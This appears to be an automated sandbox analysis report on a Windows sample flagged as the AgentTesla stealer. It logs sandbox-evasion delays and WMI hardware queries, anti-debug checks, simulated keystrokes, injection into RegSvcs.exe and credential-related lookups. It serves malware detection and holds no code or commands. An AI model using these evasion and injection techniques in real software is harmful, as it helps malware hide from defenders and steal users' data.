Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197188	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1021			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8831			Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-101575

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

API coverage: 4.7 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B04696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B04696
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B0C9C7
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0C93C FindFirstFileW,FindClose,	0_2_00B0C93C
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F200
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F35D
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0F65E
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B03A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03A2B
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B03D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03D4E
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B0BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0BF27

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AA4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA4AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99774	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99491	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1198094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1197188	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hgfsZrw6
Source: RegSvcs.exe, 00000003.00000002.4154081283.0000000005C43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	API call chain: ExitProcess graph end node	graph_0-98697
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	API call chain: ExitProcess graph end node	graph_0-98877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B141FD BlockInput,

0_2_00B141FD

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AA3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AA3B4C

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AD5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00AD5CCC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

3_2_004019F0

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B1C304 LoadLibraryA,GetProcAddress,

0_2_00B1C304

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00A434A0 mov eax, dword ptr fs:[00000030h]	0_2_00A434A0
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00A43500 mov eax, dword ptr fs:[00000030h]	0_2_00A43500
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00A41E70 mov eax, dword ptr fs:[00000030h]	0_2_00A41E70
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 2_2_01A634A0 mov eax, dword ptr fs:[00000030h]	2_2_01A634A0
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 2_2_01A63500 mov eax, dword ptr fs:[00000030h]	2_2_01A63500
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 2_2_01A61E70 mov eax, dword ptr fs:[00000030h]	2_2_01A61E70

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AF81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00AF81F7

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00ACA395
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACA364 SetUnhandledExceptionFilter,	0_2_00ACA364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004123F1 SetUnhandledExceptionFilter,	3_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 119A008

Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AF8C93 LogonUserW,

0_2_00AF8C93

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AA3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AA3B4C

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AA4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00AA4A35

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B04EF5 mouse_event,

0_2_00B04EF5

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"			Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"			Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

0_2_00AF81F7

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B04C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00B04C03

Source: GkYUK8VCrO.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: GkYUK8VCrO.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AC886B cpuid

0_2_00AC886B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

3_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AD50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00AD50D7

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AE2230 GetUserNameW,

0_2_00AE2230

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AD418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00AD418A

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AA4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA4AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
